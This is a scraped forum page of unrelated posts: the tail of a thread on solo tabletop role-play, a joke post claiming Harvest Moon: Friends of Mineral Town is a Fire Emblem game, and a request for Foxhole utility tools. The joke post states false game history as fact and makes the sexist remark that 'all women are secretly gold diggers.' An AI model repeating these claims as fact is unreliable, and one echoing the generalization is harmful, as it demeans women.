The benefit is mainly there for the player side. She has to believe that there may be someone directing the answers and reacting to the fiction he creates in that limited way. The hard thing would be convincing enough people to participate in GM'ing, and letting the players know that there are people GM'ing, to maintain the illusion.
Still, in a way, on the player side, I didn't often feel very differently from when I was playing by myself because I couldn't really tell when you were giving guidance. I'm not sure if I can generalize that to everyone, though.
My takeaway was ultimately, before we even finished the game, that solo gaming is truly more like GM prep-- which is a lot like writing. The stuff I've been tinkering with for 3+ years is almost useless, haha, but I think I learned lessons that I might apply to what I'm attempting now.
I think I will run some stuff by you later on if you don't mind. It'd be nice to get an outside perspective as I think the system/guidelines I'm putting together now are very idiosyncratic to what I want. :) ]

[I definitely responded in ways to keep you guessing as to whether it was me or the oracle. At some level, that was fun for me, but it wouldn't be (wasn't) my main reason for participating. There were times when I really wanted to push the story, but I felt like that wasn't part of the experiment.
What was really fun was seeing how you interpreted the results. When I read solo actual plays, I am always amazed by everyone's interpretations.
Feel free to run any ideas by me; email works best. I'd like to see some of your three years of thoughts.]

2018.07.31 03:54 RojinShiro Why Harvest Moon: Friends of Mineral Town is the best FE game ever created

While many cultured FE fans claim The Last Promise or Kirby and the Amazing Mirror as the best Fire Emblem game, almost the entire fanbase has forgotten about the hidden gem of the Fire Emblem series: Harvest Moon: Friends of Mineral Town. (From here on referred to as FoMT.) (The partner game More Friends of Mineral Town will be referred to as MoFo because it sounds cooler than MFoMT.)
For all you dastards that have never played FoMT, let me give a brief summary of the story and how it fits into the Fire Emblem universe. FoMT follows the story of the first true Avatar character in the series, Pete. (Or Claire in MoFo.) (Mark doesn't count, he's you, not a playable character.) As a child, Pete visits a farm while on vacation. The pedophilic old man that lives there decides to become pen pals with Pete. When the old man stops coming on to Pete after about ten years, Pete goes to the farm to see if the FBI finally caught the old man. It turns out that the old man died peacefully after committing seppuku. Like a creep, the old man leaves his entire farm to the kid he only met in person once. Nobody's willing to buy the farm from Pete, and his debt piles up so much that he's forced to actually run the whole damn farm by himself.
So, you're asking, where is FoMT in the Fire Emblem universe? Well, it's quite simple, really. In FoMT there's a character that everybody except Rick likes, named Kai. Kai shows up every summer and hangs out. The other 3/4ths of the year, he's traveling the world. He says it's for fun, but the real reason is that he's searching for his long lost little sister. That sister's name? Nino. Kai was such a popular character that all of FE7 was created in a week, as a tribute to Kai's character. Kai is only mentioned once in FE7, in a support between Nino and Canas. This is the hidden Easter egg that was put into FE7 to make Americans want to play the game. FoMT is also referenced in Wallace's ending, as he goes to Ilia and becomes a farmer, much like Pete does in FoMT.
Now that I've explained it for the elitists, it's time for why FoMT is the best FE game to date.
  1. Unlimited durability
In FoMT all weapons (known as tools in FoMT) have infinite durability. Despite this being the center of controversy pre-release, it was revealed that this was to balance the fatigue system that was returning (with adjustments) from FE5.
  1. No classes
In FoMT the only playable character is Pete (or Claire in FoMT). In creating a simplified version of other FE games, with only one character, they didn't want to lose the different weapon sets, so Pete can wield any tool he owns, even without reclassing.
  1. Weapon experience makes sense.
Swinging an axe is the same process, whether it's iron, steel, or silver. Realizing that the old weapon experience system made no sense, the developers revolutionized it in FoMT. In FoMT, you gain weapon exp every time you use a tool, and once it reaches 100%, you can pay to have it upgraded at the blacksmith. This creates a genius system where the later in the game you are the better tools you have.
  1. FoMT introduced many things never before seen in the series.
Upgrading weapons via blacksmith, farming simulation in a FE game, useless 2nd gen characters, golden lumber, avatar characters, support events with every other cast member, eating and bathing in hot springs to restore stamina, unbreakable weapons, continuous marriage, cheating on your wife, the Harvest Goddess, a peaceful story that doesn't have conflict, non-turn-based gameplay, partner games, and so much more was first introduced to FE in FoMT.
  1. Realistic relationship growth
In most FE games, two units fight together for a while, and then fall in love, and then maybe get married. That's total bullshit and we all know it. Real relationships take a lot more time to cultivate than that. In FoMT you have the very realistic chance to give the bacheloette you're interested in presents every day. And guess what? If they don't like it, they just fucking hate you. This game is not for the faint of heart. Even after the one you like is massively in love with you, she'll refuse your marriage proposal if your house isn't big enough and you don't have all the fancy accessories that go with it. It just reinforces the absolute fact that all women are secretly gold diggers.
  1. The most compelling story in all of FE history
You literally just run a farm. You have nothing to worry about so long as you keep your chickens fenced in and kick Cliff out of town so Ann will always be available as a backup wife.
So basically, Harvest Moon: Friends of Mineral Town is the best Fire Emblem game and if you disagree you're wrong.
I will also be answering questions about FoMT in the comments, with specifics on how it compares to other FE games.

2018.04.16 17:40 Crimsonkat [Questions] Are there any utility programs for foxhole? If so, what are they?

edit:(I'll update this with things that I either find or am told about)
What I mean by this:
  • Calculators (Howitzers, artillery1,2, building material, etc)
  • Defense Simulator (i.e., program that let's you see LoS day/night with placements of buildings, with other added functionality if possible)
  • Timers (Just wondering if there are any foxhole dedicated ones, I know I can just use google, I've done it before)
  • Map drawing/sharing
  • ...and anything else that might be useful!
If there aren't, I was thinking about giving it a shot.
I've searched Github and Google and nothing was really coming up. Mostly, I really enjoy building defenses and want to check placements so that I can do it right in-game. I want this game to live for a long long time. I've really enjoyed it.
Additional Utilities (Not programs):
